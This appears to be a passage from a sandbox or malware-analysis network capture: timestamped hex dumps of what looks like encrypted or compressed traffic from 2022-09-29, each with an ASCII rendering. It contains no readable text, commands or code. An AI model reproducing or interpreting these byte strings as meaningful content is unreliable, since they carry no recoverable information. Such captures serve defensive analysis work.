de b2 d9 2a 78 8d c4 73 02 00 70 a9 66 81 c6 c4 00 f3 e9 2b e5 62 42 e4 ed be e1 23 90 0a ee 62 bc 89 61 d4 9f 7a 09 06 f3 12 6e 9f 86 65 dd 38 98 0b 7b ca 4f f7 2b 9c 42 d0 40 b9
                                                                                                        Data Ascii: L55&LmExsUrK2o($80Ed\`+hZa{(gVgcJ!q+\?u0#F9C;5B7Oy4:F/.CexY;QZthJ]7bZxqXJ"1-$v*xspf+bB#bazne8{O+B@
                                                                                                        2022-09-29 12:46:30 UTC12088INData Raw: a7 13 d3 49 64 be 36 fb d4 d7 6b f2 d4 cc a8 dc c6 54 e9 d1 55 fb b5 32 17 ce 2d 86 90 73 43 cf 86 70 3a 2a 04 82 be 32 4e 5f 25 17 4c 3b 37 1c 3b bc 56 a4 18 f4 bb 25 76 87 55 f2 b0 e2 23 f3 75 7b fd 19 ba 1d cf 50 8f 32 68 e5 0b 43 a1 2f 9f 26 01 d2 8a 8d 6c 06 60 b9 33 0d 1d 47 a4 82 89 ae 28 54 d6 81 b3 25 8d ab f1 86 f4 4d 22 98 2c 7d f4 0f 5d e5 2b a1 95 34 3e 93 a5 5a 20 6c 42 f0 a5 f0 34 af 31 5e fe 40 50 d9 de f3 28 27 ad 84 48 8a ca 51 68 d1 4e e2 0b 12 cf 4c c4 22 01 2a 67 7e 93 40 1f 3a ae 87 aa 3d 3a d2 23 79 cd 3c bc 84 6c e5 df a7 59 11 f0 f0 b3 75 9a f6 8a ec 88 ae fa 7b 07 20 46 d0 68 1b da 8f d0 a7 3d 1b 46 30 7b 5a 16 1a 36 e9 91 70 19 04 bd b9 10 4e 68 67 fc 30 f0 74 fc ae ca 17 63 ec f2 95 36 91 a4 d0 99 33 7b 4e d3 72 49 e7 64 cb cd
                                                                                                        Data Ascii: Id6kTU2-sCp:*2N_%L;7;V%vU#u{P2hC/&l`3G(T%M",}]+4>Z lB41^@P('HQhNL"*g~@:=:#y<lYu{ Fh=F0{Z6pNhg0tc63{NrId
                                                                                                        2022-09-29 12:46:30 UTC12104INData Raw: a4 44 67 6e ff 95 d6 1f a1 9d 49 d2 fc 5f 55 bb 2c d3 a9 e3 f0 54 f5 2a 56 d2 11 1f aa 47 99 d7 a9 11 2c 35 a6 ae 2d 09 c6 ba 8b 2b 86 22 28 9a aa a3 04 85 d4 eb 51 34 6b 4d a4 dc 77 5d b1 88 c7 a9 b7 cc 34 60 8b 4e 42 f0 db dd 70 1c 2c 45 6b f6 de 87 f5 b4 28 e1 b7 da ee 1c 66 66 dd 40 bc 97 6e 02 86 4c 97 22 0e d2 36 c3 cc 44 7c 46 ea 93 4a 4a 2b 67 00 a3 24 d5 23 83 72 d4 2d 60 12 6f 86 b3 e4 a6 9e ff 6f 27 72 f4 47 c4 79 ee 4c 59 0f ed 30 f5 a3 77 5c f8 cc 08 e4 ed 01 35 4a 3c 90 b9 28 69 c0 18 60 ce ec 5f a2 a6 a6 4f f1 0a ea fb 19 ab 10 a6 e9 17 78 49 39 96 61 72 8d c9 e5 b8 48 0b e9 6c 73 24 4d a0 0a 42 2d 6c f1 f9 a3 7d 71 c8 b4 98 6c 9d 42 7e e5 b1 3b 4b 5a 4e 8b 16 cc c0 bd d5 09 bd 07 40 b6 aa 93 f8 f7 1b 8d 86 79 e3 94 2d cf 78 ad 1a a7 18 24
                                                                                                        Data Ascii: DgnI_U,T*VG,5-+"(Q4kMw]4`NBp,Ek(ff@nL"6D|FJJ+g$#r-`oo'rGyLY0w\5J<(i`_OxI9arHls$MB-l}qlB~;KZN@y-x$
                                                                                                        2022-09-29 12:46:30 UTC12120INData Raw: cd c4 cc 37 15 d6 d1 8d df 28 2a 7d f5 da 27 7e 61 a4 16 cd fd a8 85 65 6a 0b 6a 3b ac 14 67 9e 42 8e c6 68 a0 da b8 d4 a4 b9 a2 1d 18 03 3e 4e 82 9a 2f 9e 3d b1 90 9f f5 fd c8 9e 8f cf fe 09 5a fc ae 59 ff 94 b5 a3 62 b4 39 42 eb b3 59 0a 7b 6e 8f 56 e8 9b a5 c7 ca 50 95 5a d5 55 32 65 5b 9d 10 22 6d 58 2e bb f4 42 a5 d0 c1 c9 52 4f a5 83 da f8 ff e5 58 85 19 ad df bd 44 ab 85 ac 9f e2 92 d8 be cb ce d9 34 ba 80 cf d9 1e b9 29 59 c3 fd 9d 83 45 a0 76 bd 52 b6 aa 80 86 71 32 9c 3e 4d 10 37 0a 86 7e 64 89 31 db 92 74 38 3c aa 2a 3e 83 b4 dd 85 ff 67 13 b2 79 a6 17 6d de 63 cc 73 7e a2 8f 3a eb 21 2b 7d 62 ed 88 05 d4 cd 42 11 ce 07 82 5d b1 ae 7c da 51 f4 65 09 b9 70 d3 8f 7a 9c b5 14 70 6d f4 35 6c 67 2b 01 83 a1 bb 21 07 b7 01 56 c2 33 dd 20 33 02 31 87
                                                                                                        Data Ascii: 7(*}'~aejj;gBh>N/=ZYb9BY{nVPZU2e["mX.BROXD4)YEvRq2>M7~d1t8<*>gymcs~:!+}bB]|Qepzpm5lg+!V3 31
                                                                                                        2022-09-29 12:46:30 UTC12136INData Raw: 19 7b 27 d0 94 8a f3 6d e5 18 ab 0b 33 f9 58 de d7 a2 9d f8 bc 88 54 f8 9c 50 4b 38 23 4b 0f 60 51 f6 3e b7 29 8e df 44 88 04 d4 03 9e 9c 6b 98 b4 8a 2a 8e c1 ae 3a d4 85 1d 28 eb 04 a0 f0 f8 f0 82 78 d5 56 41 36 e2 d3 cd 6f f8 89 ef 02 2e 4b 84 cd d1 30 50 09 7d ca 29 9f ad 51 0c 41 1b c0 4e b8 84 29 73 19 8c af b7 3f a9 66 e9 0f 99 af f6 85 1c 6d ba 92 db b9 e8 1b 55 62 d7 3a 5a 69 85 d1 c3 35 06 e7 2b 01 0a ba a2 22 56 26 28 38 93 2e 31 9d 9e af 32 c3 70 b6 93 70 a7 45 77 7d 6f 5c 3e 9f 8e f5 ca b2 2e 7d 82 ce 5f 70 0b d4 fa ca fc f5 8f 4c 5b 25 90 4a f0 aa 5b 52 f5 b8 ae 5b f6 70 ed ba fc 85 30 9d 88 b5 77 b2 3a c3 f2 3c d3 09 04 6d b7 69 77 d3 3c 87 1e f5 59 f2 85 17 e6 c1 b5 8a d2 45 2d f6 37 21 75 f8 a7 df ee d5 fe 15 75 1c 35 c9 7c 97 9f 34 30 27
                                                                                                        Data Ascii: {'m3XTPK8#K`Q>)Dk*:(xVA6o.K0P})QAN)s?fmUb:Zi5+"V&(8.12ppEw}o\>.}_pL[%J[R[p0w:<miw<YE-7!uu5|40'
                                                                                                        2022-09-29 12:46:30 UTC12152INData Raw: 6d 59 8f 55 e6 3d 95 39 fa 9f d2 87 2b c1 2d 73 39 a1 92 65 ee 1d c8 b4 5c 30 04 db 4a d4 59 df 32 f8 e3 e5 f9 7b dc 80 38 9e a7 34 c8 92 66 f8 d7 ef 95 af 90 f1 3f 91 bf cb 91 49 4c bc f5 d9 2a a9 ed 1b a0 87 18 ff 80 0c c4 bc b9 5c 79 39 80 ad 8b fe 34 6f f7 a5 1d f6 a0 97 b3 cc 44 10 16 33 ba 6d aa 69 e4 06 e3 22 a3 9c f6 0f d8 5d 2b f0 0d 90 61 22 51 42 a7 70 08 c4 fe 47 08 2b 5a 06 4d 4b 6c 05 1a 12 7a bd 0c f8 bd 51 ff da ec be 5b 5e 8b 2f 3f c9 9f 98 de 2b b9 07 27 c0 5b de ec dd 10 9e 57 46 ad 82 e6 bc ab a2 7c 7b a7 b6 97 06 de 0b f5 63 58 7a a3 40 02 93 a9 f2 45 45 fa 9e 41 a3 ff d3 ab 0b f3 63 67 4a 4c f1 5c 50 50 bb b2 31 73 55 70 6c b5 fc 91 3d 6b 5a 51 90 47 a3 23 6e f5 7d 5b 5e 3a 36 7e 86 02 ad c0 2c 29 54 d0 42 42 ec bb 4d 02 c5 27 ef 99
                                                                                                        Data Ascii: mYU=9+-s9e\0JY2{84f?IL*\y94oD3mi"]+a"QBpG+ZMKlzQ[^/?+'[WF|{cXz@EEAcgJL\PP1sUpl=kZQG#n}[^:6~,)TBBM'
                                                                                                        2022-09-29 12:46:30 UTC12168INData Raw: 09 3f 0d 09 3f 59 83 3e 3d 45 3b 10 75 8f e5 4d 6c f7 c9 70 cd 9b 9d f6 12 31 3b 06 a1 31 d1 3e 29 af 4d 55 88 c6 4f f7 39 5f df 48 9a 56 b7 2f 3a b8 e3 4e 0e bd 6f fe 01 54 f5 bb bf 66 00 39 02 38 ed eb f6 f4 e8 cc 96 8e 68 d5 5d a4 f2 77 37 e2 dc ed 94 a6 98 d0 86 e6 34 03 a8 ec 64 fc b3 62 67 22 14 49 3c 9f 80 f6 b2 f1 dd 36 aa ca 57 fd 33 4b a3 a5 39 8a fe a3 28 20 57 fc e7 33 12 48 2c e2 27 09 20 01 43 5b e8 87 c3 20 d3 8a ce d7 82 b3 f0 0a 13 9f 9b 04 75 be d6 9c 86 bc 75 44 c6 8a 7d 82 7a 29 3e 1e 35 b8 44 38 33 eb a7 f3 62 97 59 79 ee b2 f8 c2 99 c8 fc f4 44 93 02 fa 3b 1f 8b b4 64 d3 ef fe 7b c0 f6 a9 13 1b fe 70 d0 4f 87 30 83 25 62 5a bd 0e 95 8c 9f 0b 4b de 4d fe 21 7c fd a3 65 4a 63 e6 22 54 54 09 23 1b 35 4c 10 c0 46 9b 29 8e 55 be af 68 31
                                                                                                        Data Ascii: ??Y>=E;uMlp1;1>)MUO9_HV/:NoTf98h]w74dbg"I<6W3K9( W3H,' C[ uuD}z)>5D83bYyD;d{pO0%bZKM!|eJc"TT#5LF)Uh1
                                                                                                        2022-09-29 12:46:30 UTC12184INData Raw: b8 ad 39 b1 8b 76 fc be 8e 7a b0 02 03 e2 82 1f 25 6b f0 67 9c 79 9e 90 74 5b f8 40 b0 b2 81 6e 9d 2e 91 f6 18 06 60 1a bd 3c a0 5b 82 b0 f9 8e d8 9c 82 7e 0c 79 cd b1 a1 27 bc 2b 8d c2 4f 3a 03 3d a2 01 c2 83 e7 ea e1 c2 88 ac b5 b6 59 c9 61 a6 66 95 b5 d4 45 fa 8d 49 f9 3d f4 10 dd 93 61 15 d2 2b a4 20 27 52 e5 dc 6c 12 3b 2e f7 09 3f b2 8d 65 e6 24 ce 1e 1c 66 36 fe 2a d7 e8 f8 93 8b 56 e8 51 68 c9 2d b4 6e 79 44 55 46 c5 e6 d4 bb da ce db 53 27 bc f2 b8 7b 1d 7b ff 55 1c 14 6e 47 97 e2 cb 8c 40 ff 8d 3c 3b be 96 c6 f8 25 28 a1 90 39 c2 dc 31 89 19 bd 80 b1 15 c4 e1 9a c4 42 50 2c ee 8d 0b 01 b1 5a 29 aa 1f e7 2c 2d 95 f3 c1 f6 f3 23 f5 77 34 51 96 07 61 be 3c 67 83 e3 f6 7a f6 9b 4d a2 a4 5d 92 e8 ce e1 ba ee 7a 33 a4 d2 32 62 86 04 51 cd ff 71 08 61
                                                                                                        Data Ascii: 9vz%kgyt[@n.`<[~y'+O:=YafEI=a+ 'Rl;.?e$f6*VQh-nyDUFS'{{UnG@<;%(91BP,Z),-#w4Qa<gzM]z32bQqa
                                                                                                        2022-09-29 12:46:30 UTC12200INData Raw: af 4c 6f c6 60 68 e9 f6 66 15 93 37 60 a6 09 ff 4d 16 a1 2e 8c e9 aa 17 54 0f 0c 1d 00 d7 a7 1d eb 44 09 9e 3d 3e 1a 15 ae 7d cd 92 74 ce 32 10 37 0d be f9 2b e6 e9 d0 22 58 62 e7 d2 44 a4 2e cc aa 96 2e 1d 88 b2 20 c0 68 5f 59 86 75 ce ac f5 19 93 19 f9 f8 00 7d 32 03 b5 7b 10 49 28 4f 55 0f b9 4a c3 00 56 a1 e6 83 3b 53 a6 0f 7e 43 81 14 fa 1f 26 2b 99 86 87 9a 59 b2 21 9c 18 92 ce 10 7e 18 5f 6f 4a ac 46 e4 5e c0 16 79 03 c2 e3 9d 99 09 b1 84 e2 48 9b 4b cd 98 9e 37 69 b5 06 5f 41 62 a6 7b 8e 58 78 59 61 ab 98 2c 2c 71 5a 95 04 8d 03 34 b2 9c 48 6a 6e cd 51 93 63 3a 8a 93 e9 9d 36 6d 68 11 74 b3 40 1c 5e 1f d5 9e d1 c5 9a fa 3e 6a 15 40 77 f9 14 0e 50 98 cd 63 ed fb a5 65 90 d2 9c da e2 24 7c ab e9 ab ea 7c 63 ce f0 06 a9 c8 c9 42 b4 19 38 42 8c 49 88
                                                                                                        Data Ascii: Lo`hf7`M.TD=>}t27+"XbD.. h_Yu}2{I(OUJV;S~C&+Y!~_oJF^yHK7i_Ab{XxYa,,qZ4HjnQc:6mht@^>j@wPce$||cB8BI
                                                                                                        2022-09-29 12:46:30 UTC12209INData Raw: e4 af 97 df 95 5e f4 50 e7 1c b5 d4 38 c4 61 30 53 83 47 17 22 07 ff 4d a3 f2 a8 b4 03 05 70 05 f5 cf 4f 8b 45 ee 94 f3 92 29 e6 3f 02 db 3e 52 2c cb ba 25 ec 6e 19 01 df e8 10 b3 0f 02 7a b4 b2 9f 4c d9 8a 31 12 c1 4e c6 fb fc 4a 6a 44 ff 62 5e 28 cd 30 e1 6c 47 55 b9 b5 ba e4 7b df 98 22 18 42 0b 6f 59 56 c6 c7 0a 38 0f 08 73 8a 19 a7 4e 0a d5 47 72 3c 13 ee 85 4c b5 2d 6b 36 e6 05 f1 0b 13 cb 30 9a 7b 04 6a 80 0a 4d e3 5a 33 59 7c 07 a9 c0 aa 77 57 66 61 bd c9 5e 15 57 48 4c 92 ac eb f1 86 59 b6 5e 52 97 94 97 1e ee 50 09 a5 b2 32 0c e7 00 f5 67 4f e5 b7 d0 ce 13 38 61 17 12 44 ef a8 3e 86 ca 38 05 ab 18 cf ec 88 0c 69 cd 6a 41 13 51 af 8d c3 d2 eb 6c 57 76 21 b4 06 ae fc 13 77 17 22 0a bb cf a7 db 87 dc 9b 71 3c 82 45 5f 94 40 a0 a1 03 99 39 8d 9d 2b
                                                                                                        Data Ascii: ^P8a0SG"MpOE)?>R,%nzL1NJjDb^(0lGU{"BoYV8sNGr<L-k60{jMZ3Y|wWfa^WHLY^RP2gO8aD>8ijAQlWv!w"q<E_@9+
                                                                                                        2022-09-29 12:46:30 UTC12225INData Raw: 84 dc 54 d3 bc 69 f8 c6 4b 29 d1 8a 8f c3 aa 08 29 e2 67 20 8d 1d 58 4e 7b fe 8e ba 62 18 e8 0b b6 d4 a5 e9 54 50 27 bb 4d bb fb fe 40 23 9c 86 50 0f ba 6c 95 70 05 a1 6a 9e c0 93 f3 7e 0b 63 73 6f 53 af 8f c4 62 91 3e 3f b8 74 05 fe f8 db e4 ab 81 3f 0a b7 a5 bd 4d 85 a6 44 2b be cf 8e 9f 69 54 d2 de fa 38 ae 36 a3 18 7a d0 c3 b5 87 bc 39 47 e1 e5 fc 2b 22 5e 05 b8 a5 e7 6e 16 ee 88 73 40 f6 df 4c fe 6a 23 43 36 40 0a 78 24 57 8a 19 0f 83 d3 6e b8 b8 64 60 82 e8 8d b2 b0 3d ef ad 9b 29 ee 75 6c e3 27 35 3d ed 9e 4f 3a e1 f5 32 b4 6f 92 91 c2 47 c8 e1 e6 60 ce 31 99 c5 42 cd 0d 0d 15 ae fb 80 b0 eb 8f 54 82 a9 1f 45 ea 7d cc 74 8d 27 e3 c2 cf 16 5d 50 8f 15 2a 65 76 aa 72 08 8c 26 3c 9b bf e3 cf 7f 61 76 32 4f dd e5 86 b0 dc 6d d3 0a 86 4c d3 74 8d d8 f3
                                                                                                        Data Ascii: TiK))g XN{bTP'M@#Plpj~csoSb>?t?MD+iT86z9G+"^ns@Lj#C6@x$Wnd`=)ul'5=O:2oG`1BTE}t']P*evr&<av2OmLt
                                                                                                        2022-09-29 12:46:30 UTC12241INData Raw: c0 ba 4c af 3b da ff 7b 50 c9 91 38 69 74 9f 31 6e cd cc f7 a3 4d 02 5d 6a 25 8c a0 9b b9 12 b4 a9 d1 37 b2 b6 2e 28 cf 0c 55 da 5e 7f d0 5f f2 2f ca 24 78 bb 2e 74 fe 69 5c 9a 86 ef 7a 4a cf 6f b4 91 ac f9 7c 60 40 39 62 b7 0f 96 43 06 d2 78 4d 19 36 b8 b8 0a df 26 94 c0 a0 9b 23 92 f5 56 b6 2b bd 39 08 af fe 21 8e aa 21 b4 31 5e 35 85 71 f1 3e e4 f4 e4 75 a8 fa 20 51 3b d0 b7 47 90 c3 bd fd 1c a6 af ed 34 c4 18 b6 ef 57 6e 9f e4 9e 77 b5 29 53 77 12 42 d0 65 cb ce 52 96 e2 68 2d a0 55 b6 73 77 1e e3 94 0a 53 2a f1 68 78 74 4b 4b 14 f3 f4 a4 b9 60 6b 1c 3d 47 9f 5c ec 53 7e 3b c6 2b ca 19 af 9c c0 5d 23 1d 32 15 9f 63 dd 17 dc 28 22 8d 10 bf 0c 47 42 08 c6 03 e4 f1 e8 3a a0 9f 2f 21 22 73 7d 36 f1 dd 35 8f 2c b9 13 de 36 ab 05 57 84 45 08 54 4e d9 00 e7
                                                                                                        Data Ascii: L;{P8it1nM]j%7.(U^_/$x.ti\zJo|`@9bCxM6&#V+9!!1^5q>u Q;G4Wnw)SwBeRh-UswS*hxtKK`k=G\S~;+]#2c("GB:/!"s}65,6WETN
                                                                                                        2022-09-29 12:46:30 UTC12257INData Raw: 8d 98 26 3c 3f 7d 18 bf 39 79 76 50 85 f1 2e f7 d8 66 0e 0c ff 98 e3 58 ee f2 91 9a 82 1a 41 85 8e d6 3f 69 85 c2 8f 4e 47 19 ec df 0d c6 8f a2 55 03 b1 3b b4 a5 f5 4e f1 d0 bc 14 65 db d5 72 ce 80 72 77 4d a2 29 9c 9c 80 f2 5c 09 83 23 db 0e 12 69 0b 4e c4 36 df 91 3c 76 a5 75 d2 1f a6 56 2c b9 3c 9f 93 be c9 6f 88 9e c5 58 0d fa 0f 36 83 e1 a8 00 11 78 b2 2b 65 20 f9 a7 3c 6a 8b e0 9b 7c 7d 83 d7 f5 cf 0e 2d 84 8c ee 47 52 9f 4a 82 92 ce e5 ba ae 13 3c ae a5 aa db c1 f1 54 68 2c b4 fc 80 3c 47 c3 75 9c b9 09 60 27 d2 98 ca 54 b8 30 83 b5 2a 41 f7 85 55 b6 ee 48 69 22 37 d7 df 6a 16 12 38 03 3c f9 70 83 bb f3 87 d1 d8 ff cc 5f 83 a6 77 2e 24 8b bd 37 8d f0 5f f6 85 c3 d3 7b aa db 77 a6 32 47 6b fb 4c e9 42 ee c5 fd 1e 4a c1 e5 f4 6e 77 93 49 17 12 e9 78
                                                                                                        Data Ascii: &<?}9yvP.fXA?iNGU;NerrwM)\#iN6<vuV,<oX6x+e <j|}-GRJ<Th,<Gu`'T0*AUHi"7j8<p_w.$7_{w2GkLBJnwIx
                                                                                                        2022-09-29 12:46:30 UTC12273INData Raw: 25 21 ae 8a a5 ba 7e e2 9d 72 d8 a6 c4 36 a6 00 e5 8e 67 33 64 4c 46 97 6c b7 63 87 f7 cf 4e e9 e2 34 d7 be 2a 4f 81 f7 2d 12 20 a1 82 f8 18 18 e9 4c f8 0f 78 49 23 81 21 c7 08 91 9a 74 9d b5 ac 78 91 ca e2 6c 39 d5 53 4e 2e 7e 9e 82 87 d5 7c 58 32 bf b2 48 af 97 3f 88 a9 fc 37 b4 2c 9a cd be 3a 34 bb 06 80 9b 13 c0 28 20 53 5c 5d 5a 17 72 30 32 cd aa f5 6c 28 80 e1 e0 cd 47 ea 37 7b 15 ff 85 0b 1c ca bb 47 04 b8 fe cf de f0 b5 3b 91 89 a5 19 c7 f2 7a 91 b5 33 b7 57 44 fa 45 4a 8b 43 1f ae ee 7f 1c 4c d3 7c a8 13 41 db 4d 6c 54 25 95 fd 2f ff 2c eb b0 15 b4 2f c2 8d e3 8c 9f c7 8a e4 bc c8 ac be 96 54 1d 35 12 ab e8 91 03 c6 21 5a c4 0f e5 5c 7a fa a6 14 cf 14 fa 6e f2 9b c2 2a 3a 6e 89 2c 91 e8 e4 02 c7 03 07 d5 70 04 ec f6 24 3e 8b 73 13 8b fa cd 10 ce
                                                                                                        Data Ascii: %!~r6g3dLFlcN4*O- LxI#!txl9SN.~|X2H?7,:4( S\]Zr02l(G7{G;z3WDEJCL|AMlT%/,/T5!Z\zn*:n,p$>s
                                                                                                        2022-09-29 12:46:30 UTC12289INData Raw: ff a6 52 b2 d7 f6 30 25 ed 46 e7 1c aa e8 da 56 94 67 fa 50 47 86 32 eb e7 c6 5f f2 72 ed 96 9f 3f 23 e7 c5 28 ad e1 dd 4a 5f 61 01 00 92 70 af b6 64 70 6f 12 fa 0a 3a 29 bf e2 9d 98 a6 9b 3d ac bd 65 60 db 0b 61 b6 3e 00 5c 04 9a 66 b8 1a d8 e5 03 a8 bd 3d 05 53 29 36 1c b4 5a d0 19 7b 0a f0 41 27 f6 73 1f 86 79 02 05 58 81 b6 52 af f3 bb f1 01 4b ad d4 8b 11 7a 89 4e 66 0a c1 0a 23 32 3a 7a a0 7f 21 ee 3e fe 73 cf 63 4d 2b dd bf f2 36 14 49 30 f3 69 3f f3 67 c7 b3 88 7b 54 7d b2 d0 ae b9 49 b2 fb 06 4d 70 0f d2 80 ca 89 5b be 06 68 ea e0 0d 64 6e fa 0c 85 07 13 8e 81 0f 8a be d4 f8 54 6f 56 a9 66 ae ad 16 a9 30 ef 3a e2 41 43 68 1d 54 35 38 b5 a9 7d da e0 8d 2c 9a 4f 27 1c c6 7d 03 79 34 1b 09 f4 d6 e2 a4 42 2b 17 73 70 3a 3c 54 6d 7c 25 cd d8 50 9e 12
                                                                                                        Data Ascii: R0%FVgPG2_r?#(J_apdpo:)=e`a>\f=S)6Z{A'syXRKzNf#2:z!>scM+6I0i?g{T}IMp[hdnToVf0:AChT58},O'}y4B+sp:<Tm|%P
                                                                                                        2022-09-29 12:46:30 UTC12305INData Raw: 76 3e d8 cf 33 27 00 7c 31 c0 f0 af 4b f9 5e e7 e1 d3 42 e7 57 f3 b2 e9 03 0b 70 a8 60 3e 30 f5 c3 d3 ed c8 23 bc 18 43 87 15 85 c4 b4 2c b5 b4 80 5b 53 33 39 94 07 f1 7b a5 c4 59 82 6b 7e 99 d8 fe 77 f2 08 3d 16 ed 06 23 f3 d0 c2 73 0a 47 0c 29 4e db f5 87 fb b4 31 d3 0e 5a 2b 73 82 45 39 f5 fd c9 59 f9 6c b4 8c 8c c2 29 cb d2 8f cd c3 3d 85 41 42 5b a5 14 09 74 0c d6 17 37 8b 0f 74 c1 86 3c 22 75 8d d3 2a 0c 97 66 52 6c 01 4f 8e 40 43 20 e7 69 03 4e 89 87 57 8f 4e 4e f2 85 20 53 4b a5 3d 06 07 62 05 05 22 56 27 1f 62 aa 79 14 e7 60 61 d1 4c 98 d8 7a 98 28 47 36 88 ef a7 f2 e4 8f 26 56 81 51 5a d6 c3 6f 74 35 cc 7d 2f 74 4e 0f af 9c 55 a8 8f 05 d3 35 b5 8f 67 2d c8 fc 48 4c b5 aa d6 d2 2c ec de a3 a1 e1 f2 4c fe b7 0d 9e cc ca 4a 8f d6 6d 7a 8b 01 a8 12
                                                                                                        Data Ascii: v>3'|1K^BWp`>0#C,[S39{Yk~w=#sG)N1Z+sE9Yl)=AB[t7t<"u*fRlO@C iNWNN SK=b"V'by`aLz(G6&VQZot5}/tNU5g-HL,LJmz
                                                                                                        2022-09-29 12:46:30 UTC12321INData Raw: 7f bf 2c 0f 4b c3 a4 48 b1 59 b7 6b 85 90 d9 4e 39 62 27 fc 38 b5 a2 6a 6c 47 01 41 5a 01 ec 58 09 5d c7 91 6b 2f b9 d8 d0 d2 a4 10 2d cd f8 c2 e4 84 54 e6 e8 4a 76 a4 f8 3f c0 23 a1 b1 91 fb 79 16 34 2c 81 76 f4 c9 17 55 8a 7a ee be ca a8 fd 22 9c 0e 59 fe 8a d3 6d 2b 86 cf 22 82 60 b9 5b ba 1f 5b 2d 15 70 3f 66 a4 1a c1 69 fe 01 b4 93 14 29 ec ad 47 8b dc 66 60 d9 f7 51 a0 e2 85 05 6f c8 00 34 ba ee 79 e3 f1 14 ab 2d 28 19 6c 00 a0 48 eb 3d 61 c9 f3 45 76 ae 78 12 15 7b 0e a1 ff b8 f7 be 78 2d 1d 6f 36 c2 1c 3a 58 b1 a0 3f 3f 80 48 bb a2 66 a3 48 f2 4c 4d 97 86 91 17 5a cc f4 b5 b0 c6 e4 3a 38 4f 4f 87 22 9f 23 4d 40 75 a1 b9 81 0d 24 e3 5d a9 f4 d7 eb 70 68 e3 37 12 b7 8b 1d da b6 54 ef 6c 82 16 47 e5 cf af 58 8b 52 81 f9 4d a7 c8 5d 71 f0 d2 98 92 6a
                                                                                                        Data Ascii: ,KHYkN9b'8jlGAZX]k/-TJv?#y4,vUz"Ym+"`[[-p?fi)Gf`Qo4y-(lH=aEvx{x-o6:X??HfHLMZ:8OO"#M@u$]ph7TlGXRM]qj
                                                                                                        2022-09-29 12:46:30 UTC12337INData Raw: 8b 03 e6 e7 13 a8 4c 06 f0 a6 4b 1f 20 b0 05 29 0f 51 bd 7f 41 93 53 0f b9 bc 24 1d 51 a7 8b 94 a2 76 44 c0 57 22 a9 0f 75 46 9e a3 f6 56 10 f1 2f e6 70 09 05 1f 51 a9 6e 5a 5c fb be 87 bb 57 7d 5d 3f 4d 76 2d 68 9e 64 c4 16 eb 66 28 b3 53 ae 74 d7 8e 0c 46 1a 42 c2 d8 fd c3 6f 11 1d bc 4f b9 76 8a c9 a5 ec bc 7c e7 d0 20 39 c1 4f 93 06 5f be 80 86 8c 98 ce 82 fc 6f 22 07 f8 0f 74 bb 19 04 d4 da fa c9 72 98 7c 6d 1e 43 20 db b6 05 b9 a9 d8 1c 5f bd 0c c6 ee 5e 56 1d 03 4a 26 da d8 7d 88 77 22 8b 0d 63 dd 93 69 3e 99 23 1a d7 2a 69 9d fa 11 0a d6 7f a3 f7 0c 05 0f 92 74 eb 7b 3f 6b 79 90 0f b6 05 6d 63 ab 0a fe e4 09 bb 13 5a 0e 83 0e 77 e6 f3 6d b3 30 65 e9 a2 01 f7 fa 38 c6 70 b7 9f 37 fb 3f ce 57 b3 2b e4 f9 ea 2d 3e 6d 53 ed e4 04 6c f2 ec b5 cf e9 82
                                                                                                        Data Ascii: LK )QAS$QvDW"uFV/pQnZ\W}]?Mv-hdf(StFBoOv| 9O_o"tr|mC _^VJ&}w"ci>#*it{?kymcZwm0e8p7?W+->mSl
                                                                                                        2022-09-29 12:46:30 UTC12353INData Raw: c2 ae 06 55 0e be 07 35 7a e5 5a 0c e2 be 6d c9 31 81 eb 82 76 53 c9 6a 9e 83 90 92 da 51 27 9d a8 8b 9a 4a 87 4e 25 fc 9e 5f 4c 14 60 ff f7 06 bf 6c c8 a3 5f f4 c1 4d 7e 6c 0e 13 f8 68 e8 17 62 b4 42 97 16 bd 63 30 e3 ad 15 ad 60 63 3c 86 2d 87 7d 80 af 76 c0 b4 4e b5 6b bb b8 f3 d5 d0 97 48 fa 39 8e a4 b3 7d de 46 2c 09 ac 7f 85 7c 41 78 9d 30 f9 f8 7b a7 be a9 77 e0 f8 ed f0 47 66 f8 a7 85 bf 29 5b 27 e2 ef 6a 13 4d 9f 71 33 e4 b3 f7 52 2c ff a2 ae bd 11 81 ad 04 b0 38 fa ff 9b 09 81 74 39 fb 00 82 c4 9e 12 93 bd 1e fb a9 04 28 bc 87 f7 ab 86 5f b1 11 0f be 5e 05 71 a8 bb 6d b4 65 7e 1a 67 63 ae 5c 86 95 b1 d0 03 89 36 6c 00 82 6c 20 1c a9 e5 96 1b ad f6 12 f6 e0 ac 75 f2 8d 0c 89 20 03 4f cd 83 7b 73 20 48 42 d8 7f 4a 80 6f 3b cf 94 07 87 3c ee c2 58
                                                                                                        Data Ascii: U5zZm1vSjQ'JN%_L`l_M~lhbBc0`c<-}vNkH9}F,|Ax0{wGf)['jMq3R,8t9(_^qme~gc\6ll u O{s HBJo;<X
                                                                                                        2022-09-29 12:46:30 UTC12369INData Raw: ff c4 29 79 90 c6 74 7c 97 6e 8c 38 d2 c4 ca a2 93 49 e2 42 62 ee aa 83 98 1c ad 5a 33 fb aa 0c 2b 39 5a 76 c1 34 3e c6 93 37 cd 1d 46 55 0e 16 d5 1f 22 f3 f2 b6 25 12 e2 20 d7 90 5c 2b 1f 15 c4 ce 02 a8 2c df fd 88 09 cb 29 18 5d 17 9b 9f de 50 20 77 b5 3e f9 f4 5b 8a 3c 80 2c 40 cb 92 50 4c eb 36 3a a0 43 49 e4 28 79 0e da 94 fb 54 b5 0e d7 35 5c 24 eb 54 3e 45 bf c0 fa ec ff b9 54 1f f3 4a 05 17 6e 81 c8 5f bf 7f 98 1a 4a bc 12 d1 a1 24 14 79 e8 b4 a1 27 a3 81 c6 2e 0f 51 35 be 7b 12 dc 5d b2 5c 88 ee 3d 0d de 8d d7 d1 b4 72 62 1b be 35 27 f4 a3 f2 42 a6 d8 90 a5 ff 7b 00 b2 d2 f1 30 55 42 6e 1a 33 25 94 b9 bf 51 28 df 8d 09 25 23 2f 86 46 e4 af 38 eb 85 03 36 bd c3 d6 17 84 ea 1f 96 38 30 25 e1 d0 03 40 eb 32 c8 4e 49 86 8c 08 85 91 6c 4f 3f 98 7b a5
                                                                                                        Data Ascii: )yt|n8IBbZ3+9Zv4>7FU"% \+,)]P w>[<,@PL6:CI(yT5\$T>ETJn_J$y'.Q5{]\=rb5'B{0UBn3%Q(%#/F8680%@2NIlO?{
